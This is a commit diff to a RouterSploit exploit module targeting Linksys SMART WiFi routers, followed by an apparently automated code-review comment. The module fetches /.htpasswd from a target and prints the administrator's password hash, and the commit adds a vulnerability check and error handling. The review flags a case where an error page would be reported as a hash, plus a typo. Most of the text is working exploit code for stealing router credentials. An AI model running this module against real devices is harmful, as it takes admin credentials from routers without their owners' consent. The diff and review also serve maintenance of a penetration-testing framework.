Commit 24a4151d by Marcin Bury

Fixing Linksys Smartwifi exploit

parent 2357038e
...@@ -7,6 +7,7 @@ from routersploit import ( ...@@ -7,6 +7,7 @@ from routersploit import (
http_request, http_request,
print_info, print_info,
print_success, print_success,
print_error,
) )
...@@ -16,12 +17,12 @@ class Exploit(exploits.Exploit): ...@@ -16,12 +17,12 @@ class Exploit(exploits.Exploit):
If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash If the target is vulnerable it allows remote attackers to obtain the administrator's MD5 password hash
""" """
__info__ = { __info__ = {
'name': '', 'name': 'Linksys SMART WiFi Password Disclosure',
'authors': [ 'authors': [
'Sijmen Ruwhof', # vulnerability discovery 'Sijmen Ruwhof', # vulnerability discovery
'0BuRner', # routersploit module '0BuRner', # routersploit module
], ],
'description': '', 'description': 'Exploit implementation for Linksys SMART WiFi Password Disclosure vulnerability. If target is vulnerable administrator\'s MD5 passsword is retrieved.',
'references': [ 'references': [
'https://www.kb.cert.org/vuls/id/447516', 'https://www.kb.cert.org/vuls/id/447516',
'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers', 'http://sijmen.ruwhof.net/weblog/268-password-hash-disclosure-in-linksys-smart-wifi-routers',
...@@ -46,16 +47,24 @@ class Exploit(exploits.Exploit): ...@@ -46,16 +47,24 @@ class Exploit(exploits.Exploit):
port = exploits.Option(80, 'Target Port') port = exploits.Option(80, 'Target Port')
def run(self): def run(self):
url = "{}:{}/.htpasswd".format(self.target, self.port) if self.check():
response = http_request(method="GET", url=url) print_success("Target seems to be vulnerable")
print_info("Unix crypt hash: $id$salt$hashed") # See more at http://man7.org/linux/man-pages/man3/crypt.3.html url = "{}:{}/.htpasswd".format(self.target, self.port)
print_success("Hash found:", response.text) response = http_request(method="GET", url=url)
if response is None:
print_error("Exploit failed - connection error")
return
print_info("Unix crypt hash: $id$salt$hashed") # See more at http://man7.org/linux/man-pages/man3/crypt.3.html
print_success("Hash found:", response.text)
else:
print_error("Exploit failed - target seems to be not vulnerable")
@mute @mute
def check(self): def check(self):
url = "{}:{}/.htpasswd".format(self.target, self.port) url = "{}:{}/.htpasswd".format(self.target, self.port)
response = http_request(method="HEAD", url=url) response = http_request(method="GET", url=url)
if response is not None and response.status_code == 200: if response is not None and response.status_code == 200:
res = re.findall("^([a-zA-Z0-9]+:\$[0-9]\$)", response.text) res = re.findall("^([a-zA-Z0-9]+:\$[0-9]\$)", response.text)
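Review bot: In `run()`, the body of the second GET is printed as "Hash found:" with only a `response is None` guard, so a non-200 reply or an error page on the repeat request would be reported as a password hash even though it is not the content `check()` validated. Since `check()` now issues the same GET, either reuse its result or re-validate before printing, e.g. `if response is None or response.status_code != 200:`. The new `description` string also has a typo ('passsword') and says MD5, while the output label and the `\$[0-9]\$` pattern in `check()` accept any single-digit crypt id; aligning the wording would keep reported findings accurate. `check()` continues past the end of this hunk, so its return path is not visible here.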
......